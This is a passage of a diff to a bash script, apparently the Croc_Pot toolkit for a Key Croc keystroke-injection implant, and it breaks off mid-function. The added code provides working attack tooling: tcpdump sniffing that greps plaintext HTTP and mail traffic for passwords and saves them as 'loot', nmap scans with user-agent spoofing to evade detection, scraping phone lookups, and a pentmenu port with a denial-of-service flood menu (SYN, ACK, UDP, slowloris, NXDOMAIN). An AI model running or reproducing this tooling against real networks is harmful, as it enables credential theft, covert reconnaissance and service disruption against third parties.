IN HEX AND ASCll${LINE_}\n" >> ${LOOT_TCPDUMP} ; tcpdump -XX -i any >> ${LOOT_TCPDUMP} ; cat ${LOOT_TCPDUMP} ; tcpdump_scan ;; + 3) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}PACKETS WITH IP ADDRESS${LINE_}\n" >> ${LOOT_TCPDUMP} ; tcpdump -n -i any >> ${LOOT_TCPDUMP} ; cat ${LOOT_TCPDUMP} ; tcpdump_scan ;; + 4) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}CURRENT NETWORK INTERFACE${LINE_}\n" >> ${LOOT_TCPDUMP} ; tcpdump >> ${LOOT_TCPDUMP} ; cat ${LOOT_TCPDUMP} ; tcpdump_scan ;; + 5) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}CHECK HOST COMMUNICATION${LINE_}\n" >> ${LOOT_TCPDUMP} ; read_all ENTER IP AND PRESS [ENTER] && tcpdump -i any src host ${r_a} >> ${LOOT_TCPDUMP} ; cat ${LOOT_TCPDUMP} ; tcpdump_scan ;; + 6) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}TCP PACKET HTTP REQUEST${LINE_}\n" >> ${LOOT_TCPDUMP} ; tcpdump -i any port http >> ${LOOT_TCPDUMP} & tcpdump -i any port 80 >> ${LOOT_TCPDUMP} & tcpdump -A -s 1492 dst port 80 or -A -s 1492 src port 80 >> ${LOOT_TCPDUMP} & tcpdump -i any port http or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|userna me:|password:|login:|pass |user ' >> ${LOOT_TCPDUMP} & tail -f ${LOOT_TCPDUMP} ; tcpdump_scan ;; + 7) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}PACKET OF TCP,UDP,ICMP${LINE_}\n" >> ${LOOT_TCPDUMP} ; tcpdump -n -v tcp or udp or icmp and not port 22 >> ${LOOT_TCPDUMP} ; cat ${LOOT_TCPDUMP} ; tcpdump_scan ;; + 8) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}HOST HEADER HTTP${LINE_}\n" >> ${LOOT_TCPDUMP} ; tcpdump -i any -n -s 0 -w - | grep -a -o -E --line-buffered "GET \/.*|Host\: .*" >> ${LOOT_TCPDUMP} & tail -f ${LOOT_TCPDUMP} && tcpdump_scan ;; + 9) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}DNS QUERY REQUEST${LINE_}\n" >> ${LOOT_TCPDUMP} ; tcpdump -i any 'udp port 53' >> ${LOOT_TCPDUMP} ; cat ${LOOT_TCPDUMP} ; tcpdump_scan ;; + 10) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}TCPDUMP SCAN${LINE_}\n" >> ${LOOT_TCPDUMP} ; read_all ENTER TCPDUMP SCAN THEN PRESS [ENTER] && ${r_a} >> ${LOOT_TCPDUMP} ; cat ${LOOT_TCPDUMP} ; tcpdump_scan ;; + 11) main_menu ;; 0) exit 0 ;; [bB]) croc_recon ;; *) invalid_entry ; tcpdump_scan ;; esac } ## #----Recon Nmap mean/Function ## -function nmap_menu() { +nmap_menu() { + echo -ne "$(Info_Screen ' +-Start some basic nmap scan and save to Loot/Croc_Pot folder +-Enter IP for scan or default will be target pc ip')\n" local IP_WLAN=$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-) local LOOT_NMAP=/root/udisk/loot/Croc_Pot/KeyCroc_NMAP.txt - echo -ne "$(Info_Screen '-Start some basic nmap scan and save to loot folder --Enter IP for scan or default will be target pc ip')\n\n" ## #----Nmap User IP Input Function ## user_ip_f() { read_all ENTER IP TO USE FOR NMAP SCAN AND PRESS [ENTER] -if [[ "${r_a}" =~ ^(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|(([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){2}(((:[0-9A-Fa-f]{1,4}){1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){1}(((:[0-9A-Fa-f]{1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))))$ ]]; then +if [[ "${r_a}" =~ ${validate_ip} ]]; then IP_SETUP=${r_a} echo -ne "\t${LINE_}$(ColorGreen 'USING IP THAT WAS ENTER')${r_a}\n" else @@ -508,18 +632,8 @@ fi #----Nmap Scan Menu ## LED B -MenuTitle NMAP MENU -MenuColor 1 REGULAR SCAN ; echo -ne " ${clear}\n" -MenuColor 2 QUICK SCAN ; echo -ne " ${clear}\n" -MenuColor 3 QUICK PLUS ; echo -ne " ${clear}\n" -MenuColor 4 PING SCAN ; echo -ne " ${clear}\n" -MenuColor 5 INTENSE SCAN ; echo -ne " ${clear}\n" -MenuColor 6 INTERFACE SCAN ; echo -ne " ${clear}\n" -MenuColor 7 PORT SCAN ; echo -ne " ${clear}\n" -MenuColor 8 PERSONAL SCAN ; echo -ne " ${clear}\n" -MenuColor 9 TARGET PC SCAN ; echo -ne " ${clear}\n" -MenuColor 10 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle NMAP MENU ; MenuColor 20 1 REGULAR SCAN ; MenuColor 20 2 QUICK SCAN ; MenuColor 20 3 QUICK PLUS ; MenuColor 20 4 PING SCAN ; MenuColor 20 5 INTENSE SCAN +MenuColor 20 6 INTERFACE SCAN ; MenuColor 20 7 PORT SCAN ; MenuColor 20 8 PERSONAL SCAN ; MenuColor 20 9 TARGET PC SCAN ; MenuColor 19 10 RETURN TO MAIN MENU ; MenuEnd 23 case $m_a in 1) user_ip_f ; croc_title_loot | tee ${LOOT_NMAP} ; echo -e "\t${LINE_}NMAP REGULAR SCAN${LINE_}\n" | tee -a ${LOOT_NMAP} ; nmap ${IP_WLAN} ${IP_SETUP} | tee -a ${LOOT_NMAP} ; nmap_menu ;; 2) user_ip_f ; croc_title_loot | tee ${LOOT_NMAP} ; echo -e "\t${LINE_}NMAP QUICK SCAN${LINE_}\n" | tee -a ${LOOT_NMAP} ; nmap -T4 -F ${IP_WLAN} ${IP_SETUP} | tee -a ${LOOT_NMAP} ; nmap_menu ;; @@ -529,11 +643,7 @@ MenuEnd 6) croc_title_loot | tee ${LOOT_NMAP} ; echo -e "\t${LINE_}NMAP INTERFACE SCAN${LINE_}\n" | tee -a ${LOOT_NMAP} ; nmap --iflist | tee -a ${LOOT_NMAP} ; nmap_menu ;; 7) user_ip_f ; croc_title_loot | tee ${LOOT_NMAP} ; echo -e "\t${LINE_}NMAP PORT SCAN${LINE_}\n" | tee -a ${LOOT_NMAP} ; nmap --top-ports 20 ${IP_WLAN} ${IP_SETUP} | tee -a ${LOOT_NMAP} ; nmap_menu ;; 8) croc_title_loot | tee ${LOOT_NMAP} ; echo -e "\t${LINE_}NMAP PERSONAL SCAN${LINE_}\n" ; read_all ENTER PERSONAL NMAP SCAN SETTING THEN PRESS [ENTER] && ${r_a} | tee -a ${LOOT_NMAP} ; nmap_menu ;; - 9) pc_scan ; nmap_menu ;; - 10) main_menu ;; - 0) exit 0 ;; - [bB]) croc_recon ;; - *) invalid_entry ; nmap_menu ;; + 9) pc_scan ; nmap_menu ;; 10) main_menu ;; 0) exit 0 ;; [bB]) croc_recon ;; *) invalid_entry ; nmap_menu ;; esac } ## @@ -549,7 +659,7 @@ scan_all() { echo -ne "\n$(ColorYellow 'Maybe next time')\n" croc_recon ;; *) - invalid_entry ; ${@::1} ;; + invalid_entry ; ${1} ;; esac } ## @@ -557,7 +667,8 @@ esac ## traceroute_scan() { clear - echo -ne "$(Info_Screen 'Traceroute scan enter IP or web site name')\n\n" + echo -ne "$(Info_Screen ' +-Traceroute scan enter IP or web site name')\n\n" scan_all traceroute_scan traceroute } ## @@ -565,7 +676,8 @@ traceroute_scan() { ## whois_scan() { clear - echo -ne "$(Info_Screen 'Whois Lookup scan enter IP or web site name')\n\n" + echo -ne "$(Info_Screen ' +-Whois Lookup scan enter IP or web site name')\n\n" install_package whois WHOIS whois_scan croc_recon scan_all whois_scan whois } @@ -574,7 +686,8 @@ whois_scan() { ## dns_scan() { clear - echo -ne "$(Info_Screen 'DNS Lookup scan enter IP or web site name')\n\n" + echo -ne "$(Info_Screen ' +-DNS Lookup scan enter IP or web site name')\n\n" install_package dnsutils DNSUTILS dns_scan croc_recon scan_all dns_scan dig } @@ -583,32 +696,35 @@ dns_scan() { ## target_ping() { clear - echo -ne "$(Info_Screen 'Ping scan enter IP or web site name')\n\n" - scan_all target_ping ping -c 5 -w 5 + echo -ne "$(Info_Screen ' +-Ping scan enter IP or web site name')\n\n" + scan_all target_ping ping -q -c 5 -w 5 } ## #----Recon Port scan with Netcat Function ## target_port() { clear - echo -ne "$(Info_Screen '-Port scan with Netcat enter IP or web site name + echo -ne "$(Info_Screen ' +-Port scan with Netcat enter IP or web site name -Port range will start at port 1 enter port range to stop -Click Ctrl+C to stop script')\n\n" read_all START SCAN Y/N AND PRESS [ENTER] case $r_a in [yY] | [yY][eE][sS]) - read_all ENTER IP OR WEB SITE NAME AND PRESS [ENTER] - echo -ne "${blue}ENTER PORT RANGE FOR SCAN AND PRESS [ENTER]:${clear}"; read range_port - broken=0 + read_all ENTER IP OR WEB SITE NAME AND PRESS [ENTER] ; n_ip=${r_a} + read_all ENTER PORT RANGE FOR SCAN AND PRESS [ENTER] ; range_port=${r_a} + local broken=0 break_script() { - broken=1 + local broken=1 } trap break_script SIGINT for (( PORT = 1; PORT < $range_port; ++PORT )); do - nc -z -w 1 "$r_a" "$PORT" < /dev/null; + nc -z -w 1 "$n_ip" "$PORT" < /dev/null; if [ $? -eq 0 ]; then echo -ne "${green}Open port $PORT${clear}\n" -elif [ $broken -eq 1 ]; then break +elif [ $broken -eq 1 ]; then + break fi done ;; [nN] | [nN][oO]) @@ -623,46 +739,1219 @@ esac ## ssl_scan() { clear - echo -ne "$(Info_Screen 'Scanning TLS/SSL configuration with SSLscan --SSLscan is a command-line tool example: sslscan googel.com:443')\n\n" + echo -ne "$(Info_Screen ' +-Scanning TLS/SSL configuration with SSLscan +-SSLscan is a command-line tool example: sslscan google.com:443')\n\n" install_package sslscan SSLSCAN ssl_scan croc_recon scan_all ssl_scan sslscan --no-failed } ## +#----Recon phone number lookup +## +phone_lookup() { + echo -ne "$(Info_Screen ' +-Phone number lookup 555-555-5555 +-curl https://www.phonelookup.com')\n\n" + local userAgentList=( +"Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1" +"Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36" +"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" +"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4" +"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" +"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" +"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16" +"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152;" +"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" +"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20061201 Firefox/2.0.0.17 (Ubuntu-feisty)" +"Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B367" +"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" +"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR" +"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" +"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR" +"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322; InfoPat" +"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4" +) +local userAgent="${userAgentList[ $(expr $RANDOM \% ${#userAgentList[*]}) ]}" +read_all ENTER PHONE NUMBER TO LOOKUP AND PRESS [ENTER] +curl -sk https://www.phonelookup.com/1/${r_a} -A "$userAgent" | grep -e "h[14]" | head -n14 | sed -e "s/^\s*//" -e "s/\s*$//" -e "s/<[^>]*>//g" | sed '1c\ ' #-e "s/^.*:\s//" +} +## +#----Recon check dns leak test +## +leak_dns() { + echo -ne "$(Info_Screen ' +-DNS leak tests +-BY https://bash.ws/')\n\n" +local api_domain='bash.ws' +local error_code=1 +increment_error_code() { + error_code=$((error_code + 1)) +} +echo_bold() { + echo -e "${yellow}${1}${clear}" +} +echo_error() { + (>&2 echo -e "${red}${1}${clear}") +} +program_exit() { + command -v $1 > /dev/null +if [ $? -ne 0 ]; then + echo_error "Please, install \"$1\"" + $error_code +fi + increment_error_code +} +check_internet_connection() { + curl -k --silent --head --request GET "https://${api_domain}" | grep "200 OK" > /dev/null +if [ $? -ne 0 ]; then + echo_error "No internet connection." + $error_code +fi + increment_error_code +} +program_exit curl +program_exit ping +check_internet_connection +if command -v jq &> /dev/null; then + jq_exists=1 +else + jq_exists=0 +fi +if hash shuf 2>/dev/null; then + id=$(shuf -i 1000000-9999999 -n 1) +else + id=$(jot -w %i -r 1 1000000 9999999) +fi +for i in $(seq 1 10); do + ping -c 1 "${i}.${id}.${api_domain}" > /dev/null 2>&1 +done +print_servers() { +if (( $jq_exists )); then + echo ${result_json} | \ + jq --monochrome-output \ + --raw-output \ + ".[] | select(.type == \"${1}\") | \"\(.ip)\(if .country_name != \"\" and .country_name != false then \" [\(.country_name)\(if .asn != \"\" and .asn != false then \" \(.asn)\" else \"\" end)]\" else \"\" end)\"" +else + while IFS= read -r line; do + if [[ "$line" != *${1} ]]; then + continue + fi + ip=$(echo $line | cut -d'|' -f 1) + code=$(echo $line | cut -d'|' -f 2) + country=$(echo $line | cut -d'|' -f 3) + asn=$(echo $line | cut -d'|' -f 4) + if [ -z "${ip// }" ]; then + continue + fi + if [ -z "${country// }" ]; then + echo "$ip" + else + if [ -z "${asn// }" ]; then + echo "$ip [$country]" + else + echo "$ip [$country, $asn]" + fi + fi + done <<< "$result_txt" +fi +} +if (( $jq_exists )); then + result_json=$(curl -k --silent "https://${api_domain}/dnsleak/test/${id}?json") +else + result_txt=$(curl -k --silent "https://${api_domain}/dnsleak/test/${id}?txt") +fi +dns_count=$(print_servers "dns" | wc -l) +echo_bold "Your IP:" +print_servers "ip" +echo "" +if [ ${dns_count} -eq "0" ];then + echo_bold "No DNS servers found" +else +if [ ${dns_count} -eq "1" ];then + echo_bold "You use ${dns_count} DNS server:" +else + echo_bold "You use ${dns_count} DNS servers:" +fi + print_servers "dns" +fi +echo "" +echo_bold "Conclusion:" +print_servers "conclusion" +} +## +#----Recon check e-mail leak test +## +email_leak() { + echo -ne "$(Info_Screen ' +-Check e-mail if leaked +-BY https://bash.ws/')\n\n" +local api_domain='bash.ws' +local error_code=1 +increment_error_code() { + error_code=$((error_code + 1)) +} +echo_bold() { + echo -e "${yellow}${1}${clear}" +} +echo_error() { + (>&2 echo -e "${red}${1}${clear}") +} +program_exit() { + command -v $1 > /dev/null +if [ $? -ne 0 ]; then + echo_error "Please, install \"$1\"" + $error_code +fi + increment_error_code +} +check_internet_connection() { + curl -k --silent --head --request GET "https://${api_domain}" | grep "200 OK" > /dev/null +if [ $? -ne 0 ]; then + echo_error "No internet connection." + $error_code +fi + increment_error_code +} +print_servers() { +if (( $jq_exists )); then + echo ${result} | \ + jq --monochrome-output \ + --raw-output \ + ".[] | select(.type == \"${1}\") | \"\(.ip)\(if .country_name != \"\" and .country_name != false then \" [\(.country_name)\(if .asn != \"\" and .asn != false then \" \(.asn)\" else \"\" end)]\" else \"\" end)\"" +else + while IFS= read -r line; do + if [[ "$line" != *${1} ]]; then + continue + fi + ip=$(echo $line | cut -d'|' -f 1) + code=$(echo $line | cut -d'|' -f 2) + country=$(echo $line | cut -d'|' -f 3) + asn=$(echo $line | cut -d'|' -f 4) + if [ -z "${ip// }" ]; then + continue + fi + if [ -z "${country// }" ]; then + echo "$ip" + else + if [ -z "${asn// }" ]; then + echo "$ip [$country]" + else + echo "$ip [$country, $asn]" + fi + fi + done <<< "$result" +fi +} +program_exit curl +program_exit ping +program_exit mail +check_internet_connection +if command -v jq &> /dev/null; then + jq_exists=1 +else + jq_exists=0 +fi +if hash shuf 2>/dev/null; then + id=$(shuf -i 1000000-9999999 -n 1) +else + id=$(jot -w %i -r 1 1000000 9999999) +fi +if (( $jq_exists )); then + format="json" +else + format="txt" +fi +result=$(curl -k --silent "https://${api_domain}/email-leak-test/test/${id}?${format}") +mail -s "Test" ${id}@bash.ws < /dev/null > /dev/null +for (( ; ; )) +do + result=$(curl -k --silent "https://${api_domain}/email-leak-test/test/${id}?${format}") + is_done=$(print_servers "done") +if [[ $is_done == *"1"* ]]; then + break +fi +done +echo_bold "Your IP:" +print_servers "ip" +echo "" +ips_count=$(print_servers "mail" | wc -l) +if [ ${ips_count} -eq "0" ];then + echo_bold "No IPs found in mail header" +else +if [ ${ips_count} -eq "1" ];then + echo_bold "Mail header has got ${ips_count} IP:" +else + echo_bold "Mail header has got ${ips_count} IPs:" +fi + print_servers "mail" +fi +echo "" +echo_bold "Conclusion:" +print_servers "conclusion" +} +## +#----Recon pentmenu github by Chris Spillane +## +pentmenu() { + echo -ne "$(Info_Screen ' +-Welcome to pentmenu! +-This software is only for responsible, authorised use. +-YOU are responsible for your own actions! +-Readme:https://raw.githubusercontent.com/GinjaChris/pentmenu/master/README.md +-Big thanks to Chris Spillane - GinjaChris +-Requirements:bash, curl, netcat, hping3 or nping, openssl, stunnel, +-nmap, whois, dnsutils, ike-scan')\n\n" +install_package whois WHOIS pentmenu +install_package host HOST pentmenu +install_package hping3 HPING3 pentmenu +install_package dnsutils DNSUTILS pentmenu +#install_package stunnel STUNNEL pentmenu +install_package ike-scan IKE-SCAN pentmenu +## +#----pentmenu main menu +## +mainmenu() { +MenuTitle PENTMENU MAIN MENU ; MenuColor 20 1 RECON MENU ; MenuColor 20 2 DOS MENU ; MenuColor 20 3 EXTRACTION MENU ; MenuColor 20 4 VIEW README ; MenuColor 20 5 RETURN TO MAIN MENU ; MenuEnd 23 + case $m_a in + 1) reconmenu ;; 2) dosmenu ;; 3) extractionmenu ;; 4) showreadme ;; 5) main_menu ;; 0) exit 0 ;; [bB]) croc_recon ;; *) invalid_entry ; mainmenu ;; + esac +} +## +#----Recon menu +## +reconmenu() { +MenuTitle RECON SCAN MENU ; MenuColor 20 1 SHOW IP ; MenuColor 20 2 DNS RECON ; MenuColor 20 3 PING SWEEP ; MenuColor 20 4 QUICK SCAN ; MenuColor 20 5 DETAILED SCAN +MenuColor 20 6 UDP SCAN ; MenuColor 20 7 CHECK SERVER UPTIME ; MenuColor 20 8 IPsec SCAN ; MenuColor 20 9 RETURN TO MAIN MENU ; MenuEnd 23 + case $m_a in + 1) showip ; reconmenu;; 2) dnsrecon ; reconmenu;; 3) pingsweep ; reconmenu;; 4) quickscan ; reconmenu;; 5) detailedscan ; reconmenu;; 6) udpscan ; reconmenu;; 7) checkuptime ; reconmenu;; 8) ipsecscan ; reconmenu;; 9) mainmenu ;; 0) exit 0 ;; [bB]) mainmenu ;; *) invalid_entry ; reconmenu ;; + esac +} +## +#----input Target ip/host +## +target_input() { + read_all Please enter the target hostname or IP ; TARGET=${r_a} +} +## +#----input Target port +## +target_input_port() { + read_all Enter port default is 80 ; PORT=${r_a} +} +## +#----START SHOW IP +## +showip() { +echo -ne "$(Info_Screen ' +External IP lookup uses curl...')\n\n" +#---use curl to lookup external IP +echo -ne "${yellow}External IP is detected as:${clear} " ; curl https://icanhazip.com/s/ +#----show interface IP's +echo -ne "\n${yellow}Interface IP's are:${clear}\n" +ip a | grep inet +#----if ip a command fails revert to ifconfig +if ! [[ $? = 0 ]]; then + ifconfig | grep inet +fi +} +## +#----START DNS RECON +## +dnsrecon() { +echo -ne "$(Info_Screen ' +-This module performs passive recon via forward/reverse name lookups +-for the target (as appropriate) and performs a whois lookup')\n\n" +#----need a target IP/hostname to check + target_input + host $TARGET +#----if host command doesnt work try nslookup instead +if ! [[ $? = 0 ]]; then + nslookup $TARGET +fi +#----run a whois lookup on the target +sleep 1 && whois -H $TARGET +if ! [[ $? = 0 ]]; then +#----if whois fails, do a curl lookup to ipinfo.io + sleep 1 && curl ipinfo.io/$TARGET +fi +reconmenu +} +## +#----START PING SWEEP +## +pingsweep() { +echo -ne "$(Info_Screen ' +-This module performs a simple ICMP echo 'ping' sweep')\n\n" +#----need to know the subnet to scan for live hosts using pings +target_input +#----this could be done with ping command, but that is extremely difficult to code in bash for unusual subnets so we use nmap instead +nmap -sP -PE $TARGET --reason +} +## +#----START QUICK SCAN +## +quickscan() { +echo -ne "$(Info_Screen ' +-This module conducts a scan using nmap +-Depending on the target, the scan might take a long time to finish')\n\n" +#----we need to know where to scan. Whilst a hostname is possible, this module is designed to scan a subnet range +target_input +#----How fast should we scan the target? +#----Faster speed is more likely to be detected by IDS, but is less waiting around +echo -ne "\n\e[38;5;19;1;48;5;245mEnter the speed of scan (0 means very slow and 5 means fast). +Slower scans are more subtle, but faster means less waiting around.\n${clear}" +read_all Default is 3 ; SPEED=${r_a} +: ${SPEED:=3} +nmap -Pn -sS -T $SPEED $TARGET --reason +} +## +#----START DETAILED SCAN +## +detailedscan() { +echo -ne "$(Info_Screen ' +-This module performs a scan using nmap +-This scan might take a very long time to finish, please be patient')\n\n" +#----need a target hostname/IP +target_input +#----How fast should we scan the target? +#----Faster speed is more likely to be detected by IDS, but is less waiting around +echo -ne "\n\e[38;5;19;1;48;5;245mEnter the speed of scan (0 means very slow and 5 means fast). +Slower scans are more subtle, but faster means less waiting around.\n${clear}" +read_all Default is 3 ; SPEED=${r_a} +: ${SPEED:=3} +#----scan using nmap. Note the change in user-agent from the default nmap value to help avoid detection +nmap -script-args http.useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43" -Pn -p 1-65535 -sV -sC -A -O -T $SPEED $TARGET --reason +} +## +#----START UDP SCAN +## +udpscan() { +echo -ne "$(Info_Screen ' +-It scans ALL ports on the target system. This may take some time, please be patient')\n\n" +#----need a target IP/hostname +target_input +#----How fast should we scan the target? +#----Faster speed is more likely to be detected by IDS, but is less waiting around +echo -ne "\n\e[38;5;19;1;48;5;245mEnter the speed of scan (0 means very slow and 5 means fast). +Slower scans are more subtle, but faster means less waiting around.\n${clear}" +read_all Default is 3 ; SPEED=${r_a} +: ${SPEED:=3} +#----launch the scan using nmap +nmap -Pn -p 1-65535 -sU -T $SPEED $TARGET --reason +} +## +#----START CHECK UPTIME +## +checkuptime() { + echo -ne "$(Info_Screen ' +-This module will attempt to estimate the uptime of a given server, using hping3 +-This is not guaranteed to work')\n\n" +#----need a target IP/hostname +target_input +#----need a target port +target_input_port +: ${PORT:=80} +dos_port_check +#----how many times to retry the check? +read_all Retries? 3 is ideal and default, 2 might also work ; RETRY=${r_a} +: ${RETRY:=3} +echo -ne "\n${green}Starting..${clear}\n" +#----use hping3 and enable the TCP timestamp option, and try to guess the timestamp update frequency and the remote system uptime. +#----this might not work, but sometimes it does work very well +hping3 --tcp-timestamp -S $TARGET -p $PORT -c $RETRY | grep uptime +echo -ne "\n${green}Done.${clear}\n" +} +## +#----START IPSEC SCAN +## +#----we need to know where to scan +ipsecscan() { +target_input +#----Encryption algorithms: DES, Triple-DES, AES/128, AES/192 and AES/256 +ENCLIST="1 5 7/128 7/192 7/256" +#----Hash algorithms: MD5, SHA1, SHA-256, SHA-384 and SHA-512 +HASHLIST="1 2 4 5 6" +#----Authentication methods: Pre-Shared Key, RSA Signatures, Hybrid Mode and XAUTH +AUTHLIST="1 3 64221 65001" +#----Diffie-Hellman groups: 1, 2, 5 and 12 +GROUPLIST="1 2 5 12" +for ENC in $ENCLIST; do + for HASH in $HASHLIST; do + for AUTH in $AUTHLIST; do + for GROUP in $GROUPLIST; do + echo "--trans=$ENC,$HASH,$AUTH,$GROUP" | xargs --max-lines=8 ike-scan --retry=1 -R -M $TARGET | grep -v "Starting" | grep -v "0 returned handshake; 0 returned notify" + done + done + done +done +} +## +#----DOS menu +## +dosmenu() { +MenuTitle DOS FLOOD MENU ; MenuColor 21 1 ICMP ECHO FLOOD ; MenuColor 21 2 ICMP BLACKNURSE ; MenuColor 21 3 TCP SYN FLOOD ; MenuColor 21 4 TCP ACK FLOOD ; MenuColor 21 5 TCP RST FLOOD ; MenuColor 21 6 TCP XMAS FLOOD +MenuColor 21 7 UDP FLOOD ; MenuColor 21 8 SSL DOS ; MenuColor 21 9 SLOWLORIS ; MenuColor 20 10 IPsec DOS ; MenuColor 20 11 DISTRACTION SCAN ; MenuColor 20 12 DNS NXDOMAIN FLOOD ; MenuColor 20 13 RETURN TO MAIN MENU +MenuEnd 24 + case $m_a in + 1) icmpflood ; dosmenu;; 2) blacknurse ; dosmenu;; 3) synflood ; dosmenu;; 4) ackflood ; dosmenu;; 5) rstflood ; dosmenu;; 6) xmasflood ; dosmenu;; 7) udpflood ; dosmenu;; 8) ssldos ; dosmenu;; + 9) slowloris ; dosmenu;; 10) ipsecdos ; dosmenu;; 11) distractionscan ; dosmenu;; 12) nxdomainflood ; dosmenu;; 13) mainmenu ;; 0) exit 0 ;; [bB]) reconmenu ;; *) invalid_entry ; dosmenu ;; + esac +} +#----check a valid integer is given for the port, anything else is invalid +dos_port_check() { +if ! [[ "$PORT" =~ ^[0-9]+$ ]]; then + PORT=80 && echo -ne "${red}Invalid port,${clear}${yellow} reverting to port 80${clear}\n" +elif [ "$PORT" -lt "1" ]; then + PORT=80 && echo -ne "${red}Invalid port number chosen!${clear}${yellow} Reverting port 80${clear}\n" +elif [ "$PORT" -gt "65535" ]; then + PORT=80 && echo -ne "${red}Invalid port chosen!${clear}${yellow} Reverting to port 80${clear}\n" +else + echo -ne "${yellow}Using Port${clear}${green} $PORT${clear}\n" +fi +} +## +#----START ICMP FLOOD +## +icmpflood() { + echo -ne "$(Info_Screen ' +-Preparing to launch ICMP Echo Flood using hping3')\n\n" +#----need a target IP/hostname + 